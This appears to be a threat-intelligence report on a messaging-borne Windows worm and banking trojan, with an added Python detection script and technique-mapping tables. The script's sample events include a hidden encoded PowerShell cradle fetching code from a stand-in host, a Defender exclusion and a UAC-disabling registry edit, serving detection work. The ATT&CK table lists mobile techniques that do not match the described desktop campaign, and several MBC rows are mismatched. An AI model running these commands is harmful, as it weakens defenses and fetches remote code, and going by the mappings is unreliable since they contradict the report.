EXECUTIVE SUMMARY:
This campaign leverages web-based instant messaging sessions to deliver a self-propagating Windows worm that targets desktop users in a specific national financial market. Attackers distribute a compressed archive that contains a crafted shortcut file which, when opened on a computer, executes an obfuscated command that decodes and runs a staged PowerShell script. The first scripted stage uses a legitimate system process as cover to fetch a second-stage command from remote infrastructure and attempts to alter local security controls to reduce detection. Depending on runtime checks, the chain either installs a browser automation component that can take control of an authenticated web messaging session to forward the same malicious archive to contacts, enabling contact-based propagation, or it installs a feature-rich banking trojan tailored to monitor and interact with active browser sessions for financial and exchange activity. Affected systems are desktop operating environments where users access the messaging web client and open archive attachments on a computer. Potential business impact includes unauthorized access to customer financial accounts, fraudulent transactions, disruption to online finance services, increased incident response workload, reputational harm, and direct financial loss arising from targeted banking fraud.
The technical chain is multi-stage and intentionally obfuscated to frustrate detection and analysis. The initial artifact is a compressed archive delivered through a trusted messaging contact; inside is a Windows LNK shortcut whose target field contains an obfuscated command that reconstructs and executes a Base64-encoded PowerShell payload. The first PowerShell stage covertly spawns a legitimate system process and uses it to download a second-stage PowerShell command from remote infrastructure. The second stage contains comments and commands that aim to modify local defenses, specifically indicating goals to add exclusions and to alter elevation controls. The actor performs environment and anti-analysis checks and then selectively delivers one of two payloads: a widely used browser automation framework plus matching driver to control an already-authenticated web messaging session and reproduce the malicious archive to contacts, or a managed .NET banking trojan that monitors active browser sessions and only activates when traffic matches targeted financial and exchange domains. The chain uses multiple remote infrastructure endpoints, obfuscation, and legitimate third-party tooling to blend with normal activity and limit exposure of the banking component to only targeted hosts.
The campaign combines trusted-contact social engineering, multi-stage script execution, selective payload staging, and browser session manipulation to pursue financially motivated objectives while enabling efficient self-propagation through contacts. Observed impacts include widespread obfuscated PowerShell execution across many endpoints, attempts to alter local security controls to reduce detection, installation of browser automation tooling that can hijack authenticated messaging sessions to propagate the worm, and conditional deployment of a banking trojan on hosts that match financial targeting criteria. The design balances stealth and spread: obfuscation and the use of legitimate processes and tools reduce the probability of detection, while session hijacking and delivery via trusted contacts increase the likelihood that recipients open and execute the archive. In the broader threat landscape, this campaign aligns with financially motivated actors that prioritize targeted banking fraud, use living-off-the-land script execution, and leverage legitimate automation tooling to extend capabilities and complicate detection and analysis. The campaign's selective staging model concentrates harm on users and systems engaged in targeted financial activity, raising the risk of focused financial losses and operational disruption for affected financial and cryptocurrency services.
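As an added illustration that is not part of the original report, the following Python sketch shows how a defender could map the three described stages (hidden, encoded PowerShell launched from a shortcut that fetches a second stage; a second stage that tries to add an antivirus exclusion and weaken elevation controls; a WebDriver binary started by a script host for browser session automation) onto process-creation telemetry. The sample events and their field names, the regular expressions, the stage names and the list of WebDriver binary names are assumptions of this example and are not taken from the report; the stage-2 registry value and the default chromedriver port are widely documented and used here only as detection patterns.

```python
import base64
import re
from typing import List, Optional, Set


def encode_command(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE, then Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample process-creation events (not from the report); the field
# names mimic a typical EDR / Sysmon process-create record.
SAMPLE_EVENTS = [
    {   # stage 1: a shortcut opened from Explorer starts hidden, encoded PowerShell that pulls stage 2
        "parent": "explorer.exe", "image": "powershell.exe",
        "cmdline": "powershell.exe -w hidden -nop -enc " + encode_command(
            "iex (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s2')"),
    },
    {   # stage 2: the downloaded command adds an AV exclusion and weakens elevation prompts
        "parent": "powershell.exe", "image": "powershell.exe",
        "cmdline": r'powershell.exe -nop -c "Add-MpPreference -ExclusionPath $env:USERPROFILE; '
                   r'reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System '
                   r'/v EnableLUA /t REG_DWORD /d 0 /f"',
    },
    {   # stage 3: a WebDriver binary started by a script host, i.e. browser automation
        "parent": "powershell.exe", "image": "chromedriver.exe",
        "cmdline": "chromedriver.exe --port=9515",
    },
    {   # benign: an interactive PowerShell started from Explorer
        "parent": "explorer.exe", "image": "powershell.exe",
        "cmdline": "powershell.exe -NoProfile -Command Get-Date",
    },
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; capture the Base64 blob after it.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|enco|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
HIDDEN_WINDOW = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")
DOWNLOAD_CRADLE = re.compile(r"(?i)(DownloadString|DownloadFile|Invoke-WebRequest|iwr\s|curl\s|wget\s|Net\.WebClient)")
DEFENSE_TAMPER = [
    ("defender_exclusion", re.compile(r"(?i)Add-MpPreference\s+-Exclusion")),
    ("defender_disable", re.compile(r"(?i)Set-MpPreference\s+-Disable")),
    ("uac_tamper", re.compile(r"(?i)\b(EnableLUA|ConsentPromptBehaviorAdmin)\b")),
]
POWERSHELL = {"powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "python.exe", "node.exe"}
BROWSER_DRIVERS = {"chromedriver.exe", "msedgedriver.exe", "geckodriver.exe"}  # assumption: common WebDriver binaries


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a -EncodedCommand argument, or None if there is none / it is malformed."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify_event(event: dict) -> List[str]:
    """Tag one process-creation event with the behaviours it exhibits (order is fixed for stable output)."""
    image, parent, cmd = event["image"].lower(), event["parent"].lower(), event["cmdline"]
    decoded = decode_encoded_command(cmd) if image in POWERSHELL else None
    text = cmd + ("\n" + decoded if decoded else "")   # match on both the raw and the decoded command
    tags: List[str] = []
    if decoded is not None:
        tags.append("encoded_powershell")
    if image in POWERSHELL and parent == "explorer.exe" and HIDDEN_WINDOW.search(cmd):
        tags.append("hidden_powershell_from_explorer")   # consistent with a double-clicked shortcut
    if DOWNLOAD_CRADLE.search(text):
        tags.append("download_cradle")
    for name, pattern in DEFENSE_TAMPER:
        if pattern.search(text):
            tags.append(name)
    if image in BROWSER_DRIVERS and parent in SCRIPT_HOSTS:
        tags.append("webdriver_from_script_host")
    return tags


# Which tags, on a single event, count as evidence of each stage of the chain.
STAGE_RULES = [
    ("stage1_obfuscated_launch", {"hidden_powershell_from_explorer", "download_cradle"}, "all"),
    ("stage2_defense_tamper", {"defender_exclusion", "defender_disable", "uac_tamper"}, "any"),
    ("stage3_browser_automation", {"webdriver_from_script_host"}, "any"),
]


def stages_observed(events: List[dict]) -> Set[str]:
    """Return the set of chain stages for which at least one event supplies the required tags."""
    seen: Set[str] = set()
    for ev in events:
        tags = set(classify_event(ev))
        for stage, needed, mode in STAGE_RULES:
            if (needed <= tags) if mode == "all" else bool(needed & tags):
                seen.add(stage)
    return seen


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["parent"], "->", ev["image"], classify_event(ev))
    print("stages observed:", sorted(stages_observed(SAMPLE_EVENTS)))
```

Seeing all three stages on one host within a short window is a much stronger signal than any single tag; in practice the same matching would be fed by the endpoint agent's process-create stream rather than the constructed list above, and the decoded command text should be preserved with the alert so analysts do not have to re-decode it.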
THREAT PROFILE:
Tactic               | Technique ID | Technique                               | Sub Technique                 |
Resource Development | T1588.002    | Obtain Capabilities                     | Tool                          |
Resource Development | T1583.001    | Acquire Infrastructure                  | Domains                       |
Initial Access       | T1476        | Deliver Malicious App via Other Method  | -                             |
Execution            | T1576        | Manipulate Mobile OS File               | -                             |
Persistence          | T1628        | Modify System Permissions               | -                             |
Defense Evasion      | T1406        | Obfuscate Files or Information          | -                             |
Defense Evasion      | T1624.001    | System Software                         | Abuse Accessibility Features  |
Credential Access    | T1416        | Capture Input                           | -                             |
Credential Access    | T1517        | Access Contact List                     | -                             |
Collection           | T1533        | Data from Local System                  | -                             |
Collection           | T1430        | Location Tracking                       | -                             |
Lateral Movement     | T1475        | Deliver Malicious App via Messaging     | -                             |
Command and Control  | T1437.001    | Standard Application Layer Protocol     | Web Protocols (HTTP/HTTPS)    |
Impact               | T1445        | Generate Fraudulent Advertising Revenue | -                             |
MBC MAPPING:
Objective           | Behavior ID | Behavior                         |
Initial Access      | E1204       | User Execution                   |
Execution           | E1059       | Command and Scripting Interpreter |
Persistence         | F0012       | Registry Run Keys                |
Persistence         | F0013       | Scheduled Tasks                  |
Defense Evasion     | E1027       | Obfuscated Files/Information     |
Defense Evasion     | B0003       | Dynamic Analysis Evasion         |
Discovery           | E1082       | System Information Discovery     |
Credential Access   | E1055       | Process Injection                |
Collection          | E1083       | File/Directory Discovery         |
Collection          | E1113       | Screen Capture                   |
Collection          | E1510       | Clipboard Modification           |
Lateral Movement    | E1569       | System Services                  |
Command & Control   | C0002       | HTTP Communication               |
Impact              | B0019       | Manipulate Network Traffic       |
REFERENCES:
The following reports contain further technical details: